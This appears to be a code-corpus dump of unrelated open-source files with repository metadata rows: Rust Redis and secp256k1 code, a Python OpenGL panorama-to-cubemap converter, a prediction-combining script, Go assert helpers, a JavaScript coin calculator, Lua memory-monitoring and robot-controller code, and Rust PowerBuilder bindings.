.exists(sensor_hash_key)
.iter()
.for_each(|e: &bool| {
if !e {
let cf = "create_time".to_string();
let ed = "ext_device_id".to_string();
let field_vals = &vec![
(&cf, format!("{}", epoch_secs())),
(&ed, ext_device_id_str.to_string()),
][..];
// new sensor, make note of when it is created
let _: Result<Vec<bool>, _> =
redis_ctx.conn.hset_multiple(sensor_hash_key, field_vals);
let fields = vec![cf, ed];
result = Some(REvent::HashUpdated {
key: sensor_hash_key.to_string(),
fields,
})
}
});
result
}
fn update_sensor_hash(
redis_ctx: &RedisContext,
sensor_hash_key: &str,
measure: &model::Measurement,
maybe_sensor_upd_count: &Option<u64>,
) -> Option<REvent> {
let upd_c = &format!("{}_update_count", measure.name());
let mut data: Vec<(&str, String)> = vec![(
upd_c,
maybe_sensor_upd_count
.map(|u| u + 1)
.unwrap_or(1)
.to_string(),
)];
data.extend(measure.to_redis());
let ut = &format!("{}_update_time", measure.name());
data.push((ut, epoch_secs().to_string()));
let redis_result: Result<(), _> = redis_ctx.conn.hset_multiple(sensor_hash_key, &data[..]);
if let Err(e) = redis_result {
println!("couldn't update sensor record {}: {:?}", sensor_hash_key, e);
None
} else {
let mut fields: Vec<String> = vec![];
data.iter().for_each(|(f, _)| fields.push(f.to_string()));
Some(REvent::HashUpdated {
key: sensor_hash_key.to_string(),
fields,
})
}
}
fn internal_device_id(
external_device_id: &str,
external_device_namespace: &Uuid,
) -> Result<Uuid, uuid::parser::ParseError> {
Ok(Uuid::new_v5(
&external_device_namespace,
external_device_id.as_bytes(),
))
}
fn epoch_secs() -> u64 {
SystemTime::now()
.duration_since(SystemTime::UNIX_EPOCH)
.unwrap()
.as_secs()
}
pub fn publish_updates(redis_ctx: &RedisContext, topic: &str, updates: Vec<REvent>) {
updates.iter().for_each(|delta_event| {
if let Ok(s) = serde_json::to_string(delta_event) {
let published: Result<u64, _> = redis_ctx.conn.publish(topic, s);
if let Err(e) = published {
println!("Error publishing to {}: {}", topic, e)
}
}
})
}
| 30.785714 | 98 | 0.571743 | 3.28125 |
f07f1c21b8f06d89cde1866e0e0a9e2404549ae4 | 10,586 | py | Python | src/python/vrprim/photosphere/conv.py | cmbruns/vr_samples | 8dee056766bccca1a602c6dd58fd0a641c5033a5 | [
"MIT"
] | 1 | 2017-01-29T21:15:23.000Z | 2017-01-29T21:15:23.000Z | src/python/vrprim/photosphere/conv.py | cmbruns/vr_samples | 8dee056766bccca1a602c6dd58fd0a641c5033a5 | [
"MIT"
] | 2 | 2017-01-29T20:34:39.000Z | 2017-01-29T23:26:05.000Z | src/python/vrprim/photosphere/conv.py | cmbruns/vr_samples | 8dee056766bccca1a602c6dd58fd0a641c5033a5 | [
"MIT"
] | null | null | null | """
Convert spherical panorama in equirectangular format into cubemap format
"""
from math import pi, log2
import numpy
from libtiff import TIFF
import png
import glfw
from OpenGL import GL
from OpenGL.GL import shaders
from OpenGL.GL.EXT.texture_filter_anisotropic import GL_MAX_TEXTURE_MAX_ANISOTROPY_EXT, GL_TEXTURE_MAX_ANISOTROPY_EXT
from PIL import Image
class Converter(object):
def render_scene(self):
GL.glClear(GL.GL_COLOR_BUFFER_BIT)
GL.glUseProgram(self.shader)
equirect_loc = GL.glGetUniformLocation(self.shader, "equirect")
GL.glUniform1i(equirect_loc, 0)
GL.glDrawArrays(GL.GL_TRIANGLE_STRIP, 0, 4)
def cube_from_equirect(self, arr):
"""
Use OpenGL to efficiently warp an equirectangular image into
a single cubemap image
"""
# Set up glfw
eh = arr.shape[0]
ew = arr.shape[1]
print(ew, eh)
# Cubemap has same width, and height * 1.5, right? todo:
scale = 4.0 / pi # tan(a)/a [a == 45 degrees] # so cube face center resolution matches equirectangular equator resolution
# scale = 1.0
# scale *= 1.0 / 4.0 # optional: smaller for faster testing
tile_size = int(scale * ew / 4.0)
# optional: clip to nearest power of two subtile size
tile_size = int(pow(2.0, int(log2(tile_size))))
print("tile size = ", tile_size, " pixels")
cw = 4 * tile_size
ch = 3 * tile_size
print(cw, ch)
glfw.init()
glfw.window_hint(glfw.CONTEXT_VERSION_MAJOR, 4)
glfw.window_hint(glfw.CONTEXT_VERSION_MINOR, 5)
# glfw.window_hint(glfw.VISIBLE, False)
w = glfw.create_window(cw, ch, "Cubemap", None, None)
# Create a framebuffer and render cube_color_texture
glfw.make_context_current(w)
vao = GL.glGenVertexArrays(1)
GL.glBindVertexArray(vao)
fb = GL.glGenFramebuffers(1)
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, fb)
cube_color_tex = GL.glGenTextures(1)
if arr.dtype == numpy.uint16:
gl_type = GL.GL_UNSIGNED_SHORT
cube_internal_format = GL.GL_RGBA16
input_internal_format = GL.GL_RGB16
elif arr.dtype == numpy.uint8:
gl_type = GL.GL_UNSIGNED_BYTE
cube_internal_format = GL.GL_RGBA8
input_internal_format = GL.GL_RGB8
else:
raise
GL.glBindTexture(GL.GL_TEXTURE_2D, cube_color_tex)
GL.glTexImage2D(GL.GL_TEXTURE_2D, 0, cube_internal_format, cw, ch, 0, GL.GL_RGBA, gl_type, None)
GL.glFramebufferTexture(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT0, cube_color_tex, 0)
GL.glDrawBuffers([GL.GL_COLOR_ATTACHMENT0,])
if GL.glCheckFramebufferStatus(GL.GL_FRAMEBUFFER) != GL.GL_FRAMEBUFFER_COMPLETE:
raise "Incomplete framebuffer"
else:
print("Framebuffer OK")
# Create shader program
vtx = shaders.compileShader("""#version 450
#line 62
out vec2 tex_coord;
const vec4 SCREEN_QUAD[4] = vec4[4](
vec4(-1, -1, 0.5, 1),
vec4( 1, -1, 0.5, 1),
vec4(-1, 1, 0.5, 1),
vec4( 1, 1, 0.5, 1));
void main() {
vec4 c = SCREEN_QUAD[gl_VertexID]; // corner location
gl_Position = c;
tex_coord = 0.5 * (c.xy + vec2(1));
}
""", GL.GL_VERTEX_SHADER)
frg = shaders.compileShader("""#version 450
#line 79
layout(binding=0) uniform sampler2D equirect;
in vec2 tex_coord;
out vec4 frag_color;
const float PI = 3.14159265359;
vec3 xyz_from_equirect(in vec2 eq) {
vec2 c = 2*eq - vec2(1); // centered
float lon = PI * c.x;
float lat = -0.5 * PI * c.y;
float s = cos(lat);
return vec3(s*sin(lon), sin(lat), -s*cos(lon));
}
vec2 equirect_from_xyz(in vec3 xyz) {
float r = length(xyz.xz);
float lat = atan(xyz.y, r);
float lon = atan(xyz.x, -xyz.z);
return 0.5 * (vec2(lon / PI, -2.0 * lat / PI) + vec2(1));
}
vec3 xyz_from_cube(in vec2 cube) {
if (cube.y > 2.0/3.0) { // lower strip
if (cube.x < 1.0/4.0) {
discard;
}
else if (cube.x > 2.0/4.0) {
discard;
}
else {
vec2 xy = (cube - vec2(3.0/8.0, 5.0/6.0)) * vec2(8, -6);
return normalize(vec3(xy.x, -1, -xy.y)); // bottom
}
}
else if (cube.y < 1.0/3.0) { // upper strip
if (cube.x < 1.0/4.0) {
discard;
}
else if (cube.x > 2.0/4.0) {
discard;
}
else { // top
vec2 xy = (cube - vec2(3.0/8.0, 1.0/6.0)) * vec2(8, -6);
return normalize(vec3(xy.x, 1, xy.y));
}
}
else { // central strip
if (cube.x < 0.25) {
vec2 xy = (cube - vec2(1.0/8.0, 0.5)) * vec2(8, -6);
return normalize(vec3(-1, xy.y, -xy.x)); // left
}
else if (cube.x < 0.50) { // front
vec2 xy = (cube - vec2(3.0/8.0, 0.5)) * vec2(8, -6);
return normalize(vec3(xy.x, xy.y, -1));
}
else if (cube.x < 0.75) { // right
vec2 xy = (cube - vec2(5.0/8.0, 0.5)) * vec2(8, -6);
return normalize(vec3(1, xy.y, xy.x));
}
else { // back
vec2 xy = (cube - vec2(7.0/8.0, 0.5)) * vec2(8, -6);
return normalize(vec3(-xy.x, xy.y, 1));
}
}
}
void main() {
vec3 xyz = xyz_from_cube(tex_coord);
vec2 eq = equirect_from_xyz(xyz);
// Use explicit level of detail to avoid seam at z==1, lon==PI
// Use explicit gradients, to preserve anisotropic filtering during mipmap lookup
vec2 dpdx = dFdx(eq);
if (dpdx.x > 0.5) dpdx.x -= 1; // use "repeat" wrapping on gradient
if (dpdx.x < -0.5) dpdx.x += 1;
vec2 dpdy = dFdy(eq);
frag_color = textureGrad(equirect, eq, dpdx, dpdy);
// frag_color = vec4(eq, 0.5, 1);
// frag_color = vec4(xyz, 1);
// frag_color = vec4(tex_coord, 1, 1);
// frag_color = vec4(xyz_from_equirect(tex_coord), 1);
}
""", GL.GL_FRAGMENT_SHADER)
self.shader = shaders.compileProgram(vtx, frg)
# Bind the input equirectangular image
equi_tex = GL.glGenTextures(1)
GL.glActiveTexture(GL.GL_TEXTURE0)
GL.glBindTexture(GL.GL_TEXTURE_2D, equi_tex)
GL.glTexImage2D(GL.GL_TEXTURE_2D, 0, input_internal_format, ew, eh, 0, GL.GL_RGB, gl_type, arr)
aniso = GL.glGetFloatv(GL_MAX_TEXTURE_MAX_ANISOTROPY_EXT)
GL.glTexParameterf(GL.GL_TEXTURE_2D, GL_TEXTURE_MAX_ANISOTROPY_EXT, aniso)
GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_WRAP_S, GL.GL_REPEAT);
GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_WRAP_T, GL.GL_MIRRORED_REPEAT);
GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MAG_FILTER, GL.GL_LINEAR);
GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MIN_FILTER, GL.GL_LINEAR_MIPMAP_LINEAR);
GL.glGenerateMipmap(GL.GL_TEXTURE_2D)
# init
GL.glDisable(GL.GL_BLEND)
GL.glDisable(GL.GL_DEPTH_TEST)
GL.glViewport(0, 0, cw, ch)
GL.glClearColor(0.5, 0.5, 0.5, 0.0)
# Render the image
bToScreen = False
if bToScreen:
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, 0)
# while not glfw.window_should_close(w):
for _ in range(100):
self.render_scene()
glfw.swap_buffers(w)
else:
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, fb)
self.render_scene()
GL.glFinish()
# fetch the rendered image
result = numpy.zeros(shape=(ch, cw, 4), dtype=arr.dtype)
GL.glReadPixels(0, 0, cw, ch, GL.GL_RGBA, gl_type, result)
print(cw, ch)
print(result.shape)
# print(result.shape)
# clean up
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, 0)
GL.glDeleteTextures([cube_color_tex,])
GL.glDeleteFramebuffers([fb,])
glfw.destroy_window(w)
glfw.terminate()
# raise NotImplementedError()
return result
def to_cube(arr):
w = arr.shape[0]
h = arr.shape[1]
aspect = w / h
if aspect == 2:
return Converter().cube_from_equirect(arr)
raise NotImplementedError()
def main(arr):
if (arr.dtype == numpy.float32):
# Clip data to percentile range with dynamic range below 65535
pct_low = 0
pct_high = 100
val_low, val_high = numpy.percentile(arr[numpy.nonzero(arr)], [pct_low, pct_high])
dynamic_range = val_high / val_low
eps = 0.07
while dynamic_range > 65535:
pct_low = eps
pct_high = 100.0 - eps
val_low, val_high = numpy.percentile(arr[numpy.nonzero(arr)], [pct_low, pct_high])
dynamic_range = val_high / val_low
print(pct_low, pct_high, val_low, val_high, dynamic_range)
eps *= 1.2
arr *= 65535.0 / val_high
arr[arr>65535] = 65535
arr[arr<0] = 0
# print(numpy.histogram(arr))
arr = arr.astype('uint16')
cube = Converter().cube_from_equirect(arr)
return cube
if __name__ == "__main__":
if True:
tif = TIFF.open('1w180.9.tiff', 'r')
arr = tif.read_image()
tif.close()
else:
jpeg = Image.open('_0010782_stitch2.jpg')
arr = numpy.array(jpeg)
cube = main(arr)
if cube.dtype == numpy.uint16:
img = png.from_array(cube, 'RGBA')
img.save('cube.png')
else:
Image.fromarray(cube).save('cube.jpg', quality=95)
| 38.919118 | 129 | 0.53344 | 3.3125 |
c3d3439acf75a13b35d9c365a0760bf92cb5962d | 2,026 | rs | Rust | secp256kfun/src/libsecp_compat.rs | delta1/secp256kfun | 89c19f60a2ca33de967b1896f52282898d930be5 | [
"0BSD"
] | null | null | null | secp256kfun/src/libsecp_compat.rs | delta1/secp256kfun | 89c19f60a2ca33de967b1896f52282898d930be5 | [
"0BSD"
] | null | null | null | secp256kfun/src/libsecp_compat.rs | delta1/secp256kfun | 89c19f60a2ca33de967b1896f52282898d930be5 | [
"0BSD"
] | null | null | null | use crate::{
marker::*,
secp256k1::{PublicKey, SecretKey, XOnlyPublicKey},
Point, Scalar, XOnly,
};
impl From<Scalar> for SecretKey {
fn from(scalar: Scalar) -> Self {
SecretKey::from_slice(scalar.to_bytes().as_ref()).unwrap()
}
}
impl From<SecretKey> for Scalar {
fn from(sk: SecretKey) -> Self {
Scalar::from_slice(&sk[..])
.unwrap()
.mark::<NonZero>()
.expect("SecretKey is never zero")
}
}
impl From<PublicKey> for Point {
fn from(pk: PublicKey) -> Self {
Point::from_bytes(pk.serialize()).unwrap()
}
}
impl<T: Normalized> From<Point<T>> for PublicKey {
fn from(pk: Point<T>) -> Self {
PublicKey::from_slice(pk.to_bytes().as_ref()).unwrap()
}
}
impl From<XOnlyPublicKey> for XOnly {
fn from(pk: XOnlyPublicKey) -> Self {
XOnly::from_bytes(pk.serialize()).unwrap()
}
}
impl From<XOnly> for XOnlyPublicKey {
fn from(xonly: XOnly) -> Self {
XOnlyPublicKey::from_slice(xonly.as_bytes()).unwrap()
}
}
impl From<Point<EvenY>> for XOnlyPublicKey {
fn from(point: Point<EvenY>) -> Self {
point.to_xonly().into()
}
}
impl From<XOnlyPublicKey> for Point<EvenY> {
fn from(pk: XOnlyPublicKey) -> Self {
XOnly::from(pk).to_point()
}
}
#[cfg(test)]
mod test {
use super::*;
use core::str::FromStr;
use rand_core::RngCore;
#[test]
fn secret_key() {
let mut bytes = [0u8; 32];
rand::thread_rng().fill_bytes(&mut bytes);
let sk = SecretKey::from_slice(&bytes[..]).unwrap();
let scalar = Scalar::from(sk);
assert_eq!(&sk[..], scalar.to_bytes().as_ref());
}
#[test]
fn public_key() {
let pk = PublicKey::from_str("0479BE667EF9DCBBAC55A06295CE870B07029BFCDB2DCE28D959F2815B16F81798483ADA7726A3C4655DA4FBFC0E1108A8FD17B448A68554199C47D08FFB10D4B8").unwrap();
let point = Point::from(pk);
assert_eq!(pk.serialize().as_ref(), point.to_bytes().as_ref());
}
}
| 25.325 | 180 | 0.607601 | 3.109375 |
e7fca20cce05d1364eee53a17bec476012eb661d | 2,177 | py | Python | dropconnect/combine_pred_mod.py | zygmuntz/kaggle-cifar | 16936af9cf621d668c50491291e042a7849a1ac3 | [
"BSD-2-Clause"
] | 26 | 2015-01-12T18:00:50.000Z | 2020-12-19T23:49:16.000Z | dropconnect/combine_pred_mod.py | zygmuntz/kaggle-cifar | 16936af9cf621d668c50491291e042a7849a1ac3 | [
"BSD-2-Clause"
] | null | null | null | dropconnect/combine_pred_mod.py | zygmuntz/kaggle-cifar | 16936af9cf621d668c50491291e042a7849a1ac3 | [
"BSD-2-Clause"
] | 26 | 2015-01-10T22:35:01.000Z | 2020-01-15T08:56:53.000Z | #------------------------------------------
# this script combine result of different
# nets and report final result
#------------------------------------------
import sys
import numpy as np
from util import pickle, unpickle
def evaluate_result( result, text ):
# pre-condition check
num_batches = len( result['labels'] )
assert( num_batches == len(result['labels']) )
# compute error
num_cases = 0
num_wrong = 0
for ii in range( num_batches ):
act_index = result['labels'][ii]
num_cases_ii = act_index.shape[0]
assert( num_cases_ii == result['preds'][ii].shape[0] )
num_cases += num_cases_ii
pred_index = np.argmax( result['preds'][ii], 1 )
for jj in range( num_cases_ii ):
if pred_index[jj] != act_index[jj]:
num_wrong += 1
print text + "----Testing Error: %2.4f" % ( 1.0 *num_wrong / num_cases )
return ( 1.0 *num_wrong / num_cases )
def main():
num_args = len(sys.argv)
# load result from file
num_nets = num_args - 1
assert( num_nets > 0 )
errors = []
# 0th net
# result['labels']
# result['preds']
result = unpickle( sys.argv[1] )
errors.append( evaluate_result( result, sys.argv[1] ) )
num_batches = len( result['labels'] )
#import pdb; pdb.set_trace()
# collet all results
for ii in range( num_nets - 1 ):
result_ii = unpickle( sys.argv[ii+2] )
# evaluate result_ii
errors.append( evaluate_result( result_ii, sys.argv[ii+2] ) )
# check num of batches is consistant
num_batches_ii = len( result_ii['labels'] )
for jj in range( num_batches ):
# check label is consistant
assert( np.array_equal(
result_ii['labels'][jj], result['labels'][jj] ) )
# nc result['pred'][jj]
result['preds'][jj] += result_ii['preds'][jj]
pickle( 'combine_result', result )
# classifier mean/std accuracy
errors = np.array( errors )
#import pdb; pdb.set_trace()
print "mean: " , str(100*np.mean( errors )) , " std: " , str(100*(np.std( errors )))
# evaluate result
evaluate_result( result, "After combine" )
if __name__ == "__main__":
main()
| 30.661972 | 87 | 0.592559 | 3.546875 |
a1795f55a384b6138d1e30093e3e6ef7447da5f8 | 2,266 | go | Go | pkg/assert/assert.go | scottcagno/storage | e54fed254539aebc0588d0a736faa69dc1bfbf27 | [
"BSD-3-Clause"
] | 1 | 2021-12-11T22:32:06.000Z | 2021-12-11T22:32:06.000Z | pkg/assert/assert.go | scottcagno/storage | e54fed254539aebc0588d0a736faa69dc1bfbf27 | [
"BSD-3-Clause"
] | null | null | null | pkg/assert/assert.go | scottcagno/storage | e54fed254539aebc0588d0a736faa69dc1bfbf27 | [
"BSD-3-Clause"
] | null | null | null | package assert
import "log"
func AssertTrue(isTrue bool) {
if isTrue == true {
log.Printf("assert true: condition=%t", isTrue)
}
}
func AssertFalse(isFalse bool) {
if isFalse == false {
log.Printf("assert false: condition=%t", isFalse)
}
}
func AssertTrueMsg(isTrue bool, msg string) {
if isTrue == true {
log.Printf("%s, condition=%t", msg, isTrue)
}
}
func AssertFalseMsg(isFalse bool, msg string) {
if isFalse == false {
log.Printf("%s, condition=%t", msg, isFalse)
}
}
func AssertIfErr(err error) {
AssertIfErrMsg(err, "error")
}
func AssertIfErrMsg(err error, msg string) {
if err != nil {
log.Printf("%s %+v", msg, err)
}
}
func InfoIfTrue(isTrue bool, msg string) {
if isTrue == true {
log.Printf("%s, condition=%t", msg, isTrue)
}
}
func InfoIfFalse(isFalse bool, msg string) {
if isFalse == false {
log.Printf("%s, condition=%t", msg, isFalse)
}
}
func InfoIfErr(err error) {
InfoIfErrMsg(err, "error")
}
func InfoIfErrMsg(err error, msg string) {
if err != nil {
log.Printf("%s %+v", msg, err)
}
}
func WarnIfTrue(isTrue bool, msg string) {
if isTrue == true {
log.Printf("%s, condition=%t", msg, isTrue)
}
}
func WarnIfFalse(isFalse bool, msg string) {
if isFalse == false {
log.Printf("%s, condition=%t", msg, isFalse)
}
}
func WarnIfErr(err error) {
WarnIfErrMsg(err, "error")
}
func WarnIfErrMsg(err error, msg string) {
if err != nil {
log.Printf("%s %+v", msg, err)
}
}
func PanicIfTrue(isTrue bool, msg string) {
if isTrue == true {
log.Panicf("%s, condition=%t", msg, isTrue)
}
}
func PanicIfFalse(isFalse bool, msg string) {
if isFalse == false {
log.Panicf("%s, condition=%t", msg, isFalse)
}
}
func PanicIfErr(err error) {
PanicIfErrMsg(err, "error")
}
func PanicIfErrMsg(err error, msg string) {
if err != nil {
log.Panicf("%s %+v", msg, err)
}
}
func FailIfTrue(isTrue bool, msg string) {
if isTrue == true {
log.Fatalf("%s, condition=%t", msg, isTrue)
}
}
func FailIfFalse(isFalse bool, msg string) {
if isFalse == false {
log.Fatalf("%s, condition=%t", msg, isFalse)
}
}
func FailIfErr(err error) {
if err != nil {
log.Fatalf("error %+v", err)
}
}
func FailIfErrMsg(err error, msg string) {
if err != nil {
log.Fatalf("%s %+v", msg, err)
}
}
| 17.703125 | 51 | 0.641218 | 3.3125 |
0bf3bd3ec3ad4b49f3d757ffb24025804e0d9efa | 1,077 | js | JavaScript | src/logic.js | j2ieu/dollars-to-cents | 7d4a507034fc5e746a970464b4558e571339260a | [
"MIT"
] | null | null | null | src/logic.js | j2ieu/dollars-to-cents | 7d4a507034fc5e746a970464b4558e571339260a | [
"MIT"
] | null | null | null | src/logic.js | j2ieu/dollars-to-cents | 7d4a507034fc5e746a970464b4558e571339260a | [
"MIT"
] | null | null | null | const currencyInput = document.getElementById('money-input');
const pennyResult = document.getElementById('penny-result');
const nickelResult = document.getElementById('nickel-result');
const dimeResult = document.getElementById('dime-result');
const quarterResult = document.getElementById('quarter-result');
function convertDollarsToCents(val) {
let cents = Number(val);
if (Number.isSafeInteger(cents) ||
(Number.isSafeInteger(cents) === false && cents)) {
cents *= 100;
} else {
// default case
cents = 100;
}
return cents;
}
currencyInput.addEventListener('input', (e) => {
let cents = convertDollarsToCents(e.target.value);
let quarter = Math.floor(cents/25);
cents%=25;
let dime = Math.floor(cents/10);
cents%=10;
let nickel = Math.floor(cents/5);
cents%=5;
let penny = Math.floor(cents);
pennyResult.innerText = `1 x ${penny}`;
nickelResult.innerText = `5 x ${nickel}`;
dimeResult.innerText = `10 x ${dime}`;
quarterResult.innerHTML = `25 x ${quarter}`;
}) | 28.342105 | 64 | 0.655525 | 3.015625 |
358996e0c9c7881c6f8966b5ee533d9f4ebd63f1 | 2,994 | lua | Lua | laia/util/mem.lua | git22abhishek/Laia | 1a4afa40f08f91f33d0d47a1d89b106091ad076a | [
"MIT"
] | 137 | 2016-12-15T18:51:59.000Z | 2022-03-25T06:41:02.000Z | laia/util/mem.lua | git22abhishek/Laia | 1a4afa40f08f91f33d0d47a1d89b106091ad076a | [
"MIT"
] | 32 | 2016-12-15T18:50:54.000Z | 2022-03-23T17:13:27.000Z | laia/util/mem.lua | jpuigcerver/Laia | 1a4afa40f08f91f33d0d47a1d89b106091ad076a | [
"MIT"
] | 68 | 2016-12-17T01:27:44.000Z | 2022-03-23T08:44:35.000Z | laia = laia or {}
laia.mem = {}
local _cfg = {
monitor_interval = 0,
monitor_started = false
}
--[[
Function that returns the GPU memory used by the calling process.
First, it tries to use the nvidia-smi command to get the exact number of
memory used by the calling process.
If this information is not available, it uses cutorch.getMemoryUsage().
NOTE: This will only work on *nix systems, since it relies on /proc/self/stat,
nvidia-smi and gawk.
--]]
local _PID = io.open('/proc/self/stat', 'r'):read('*number')
local _TO_MB = { KiB = 1024, MiB = 1, GiB = 1024, TiB = 1024 * 1024 }
local _CMD = ([[nvidia-smi | gawk '{
if ($2 == "Processes:") { PF=1; }
else if (PF && $3 == %d && match($(NF - 1), /^([0-9]+)(.iB)$/, A)) {
if (A[2] == "KiB") S += A[1] / 1024;
else if (A[2] == "MiB") S += A[1] * 1;
else if (A[2] == "GiB") S += A[1] * 1024;
else if (A[2] == "TiB") S += A[1] * 1024 * 1024;
}
}END{ if (S > 0) print S; }']]):format(_PID)
function laia.mem.getCurrentGPUMemory()
local nvidia_smi = io.popen(_CMD)
local gpuMemory = (nvidia_smi ~= nil and nvidia_smi:read('*number')) or nil
if not gpuMemory and cutorch ~= nil then
local freeMemory, totalMemory = cutorch.getMemoryUsage()
gpuMemory = (totalMemory - freeMemory) / (1024 * 1024)
end
return (gpuMemory or 0)
end
--[[
Function that returns the resident CPU memory used by the calling process.
We only monitor the resident size, since this is the actually amount that we
care about (i.e. Lua uses an humongous amount of virtual memory).
NOTE: This will only work on *nix systems, since it relies on getconf and
/proc/self/statm.
]]--
local _PAGE_SIZE = io.popen('getconf PAGE_SIZE'):read('*number')
function laia.mem.getCurrentCPUMemory()
local statmf = io.open('/proc/self/statm', 'r')
statmf:read('*number') -- Ignore VmSize
local cpuMemory = statmf:read('*number') * _PAGE_SIZE / (1024 * 1024)
statmf:close()
return cpuMemory
end
local _maxCPUMemory, _maxGPUMemory = 0, 0
function laia.mem.getMaxCPUMemory()
_maxCPUMemory = math.max(laia.mem.getCurrentCPUMemory(), _maxCPUMemory)
return _maxCPUMemory
end
function laia.mem.getMaxGPUMemory()
_maxGPUMemory = math.max(laia.mem.getCurrentGPUMemory(), _maxGPUMemory)
return _maxGPUMemory
end
function laia.mem.registerOptions(parser, advanced)
advanced = advanced or false
if alarm then
parser:option(
'--memory_monitor_interval',
'If n>0, monitorizes the memory usage every n seconds.',
_cfg.monitor_interval, laia.toint)
:argname('<n>')
:bind(_cfg, 'monitor_interval')
:advanced(advanced)
end
end
wrequire('alarm')
local function _alarmMaxMemory()
_maxCPUMemory = laia.mem.getMaxCPUMemory()
_maxGPUMemory = laia.mem.getMaxGPUMemory()
alarm(_cfg.monitor_interval)
end
function laia.mem.startMonitor()
if alarm and not _cfg.monitor_started and _cfg.monitor_interval > 0 then
alarm(_cfg.monitor_interval, _alarmMaxMemory)
end
end
| 32.901099 | 80 | 0.684035 | 3.15625 |
77926bf6de937e990e2e914e8c9eeb259d4f3175 | 3,830 | rs | Rust | pbrs/src/lib.rs | gaoqiangz/pbni-rs | 0809edd7fcc2d7263d21de9e1a05584c6e249e35 | [
"BSD-2-Clause"
] | 10 | 2021-06-08T01:15:12.000Z | 2022-02-22T09:58:27.000Z | pbrs/src/lib.rs | yishuixuanyuan/pbni-rs | 0809edd7fcc2d7263d21de9e1a05584c6e249e35 | [
"BSD-2-Clause"
] | 1 | 2021-06-09T07:31:04.000Z | 2021-06-10T12:15:16.000Z | pbrs/src/lib.rs | yishuixuanyuan/pbni-rs | 0809edd7fcc2d7263d21de9e1a05584c6e249e35 | [
"BSD-2-Clause"
] | 1 | 2022-02-22T09:57:53.000Z | 2022-02-22T09:57:53.000Z | use pbni::*;
struct RustObject {}
#[nonvisualobject(name = "n_cst_test")]
impl RustObject {
#[constructor]
fn new(session: Session, ctx: ContextObject) -> RustObject { RustObject {} }
#[method(name = "of_Array")]
fn of_array(&mut self, mut arg: Array) -> Result<String> {
arg.set_item_long(&[10], 12333223)?;
let mut s = String::new();
for item in arg.iter::<pblong>() {
s += &format!("item: {:?}\n", item);
}
Ok(s)
}
#[method(name = "of_Invoke")]
fn of_invoke(&mut self, mut obj: Object) -> Result<String> {
let rv = obj.invoke_method("of_Test", pbargs!["abcd", 123])?;
Ok(rv)
}
}
struct ParentObject {
session: Session,
ctx: ContextObject,
foo: Option<PBString>
}
impl ParentObject {
fn context(&self) -> &ContextObject { &self.ctx }
fn context_mut(&mut self) -> &mut ContextObject { &mut self.ctx }
}
#[nonvisualobject(name = "n_cst_parent")]
impl ParentObject {
#[constructor]
fn new_pbobject(session: Session, ctx: ContextObject) -> ParentObject {
ParentObject {
session,
ctx,
foo: None
}
}
#[method(overload = 1)]
fn of_test<'a>(&mut self, session: Session, a: &'a PBStr, b: Option<&'a PBStr>) -> &'a PBStr {
let invoker = session.begin_invoke_function(("MessageBox", "ISS")).unwrap();
invoker.arg(0).set_str("title");
invoker.arg(1).set_str("content");
invoker.invoke();
if let Some(b) = b {
b
} else {
a
}
}
#[method(name = "of_hello", overload = 1)]
fn hello(&self, arg: String, b: Option<String>) -> String { format!("hello {},{:?}", arg, b) }
//fn of_hello2(&mut self, a: String, b: String) -> String { format!("hello {}, {}", a, b) }
#[method(name = "of_foo")]
fn of_foo(&self, obj: &Self) -> Result<String> { Ok(format!("fooxxx {:?}", obj.foo)) }
#[method(name = "of_SetFoo")]
fn of_SetFoo(&mut self, arg: &PBStr) -> bool {
self.foo = Some(arg.to_owned());
true
}
#[method(name = "of_trigger")]
fn trigger(&mut self, arg: &PBStr) -> Result<String> {
self.ontest(arg);
let eid = self.ctx.get_event_id(("ontest", "LS"));
let mid = self.ctx.get_method_id("of_test");
Ok(format!("eid: {:?}, mid: {:?}", eid, mid))
}
#[event(name = "ontest")]
fn ontest(&mut self, arg: &PBStr) -> Result<pblong> {}
}
struct ChildObject {
parent: ParentObject
}
#[nonvisualobject(name = "n_cst_child", inherit = "parent")]
impl ChildObject {
#[constructor]
fn new_pbobject(session: Session, ctx: ContextObject) -> ChildObject {
ChildObject {
parent: ParentObject {
session,
ctx,
foo: None
}
}
}
#[method(name = "of_child_hello")]
fn of_hello(&self, arg: String) -> Result<String> { Ok(format!("child hello {}", arg)) }
}
#[global_function(name = "gf_bitor")]
fn bit_or(session: Session, a: pblong, b: pblong) -> pblong { a | b }
#[global_function(name = "gf_Test")]
fn global_function_test(
session: Session,
a: &PBStr,
b: NaiveDate,
c: NaiveTime,
d: NaiveDateTime,
e: Decimal,
f: &[u8]
) -> Result<()> {
let a = a.to_string_lossy();
let b = b.to_string();
let c = c.to_string();
let d = d.to_string();
let e = e.to_string();
let blbStr = String::from_utf8_lossy(f).into_owned();
let mut obj = session.new_object("n_cst_pbtest")?;
obj.set_var_str("is_test", "我爱RUST");
let is_test = obj.get_var_string("is_test");
let invoker = obj.begin_invoke_method("of_test")?;
invoker.arg(0).set_str("call from rust to");
let rv = invoker.invoke()?.get_string();
Ok(())
}
| 29.689922 | 98 | 0.563969 | 3.03125 |
6857ab4e23d3b4665d70f99a5ebeb7eb3c6e221f | 952 | lua | Lua | lua_controllers/table_controller.lua | EMerckx/argos3-experiments | f82e066df5ff1dde155f0b8f07a113ca64ed9425 | [
"MIT"
] | 1 | 2020-08-31T12:52:01.000Z | 2020-08-31T12:52:01.000Z | lua_controllers/table_controller.lua | EMerckx/argos3-experiments | f82e066df5ff1dde155f0b8f07a113ca64ed9425 | [
"MIT"
] | null | null | null | lua_controllers/table_controller.lua | EMerckx/argos3-experiments | f82e066df5ff1dde155f0b8f07a113ca64ed9425 | [
"MIT"
] | null | null | null | -----------------------------------------------------
-- @author Ewout Merckx - <[email protected]>
-----------------------------------------------------
-- global variables
-- initialization
function init()
-- init the index
index = 0
-- set the speed of the robot to zero
robot.wheels.set_velocity(0,0)
end
-- actions for each step
function step()
-- each step, take a different color
create_key_value_table()
end
-- reinitialize the controller
function reset()
end
function destroy()
-- put your code here
end
---------------------------------------------------------------------
-- creates a table, adds some values to it
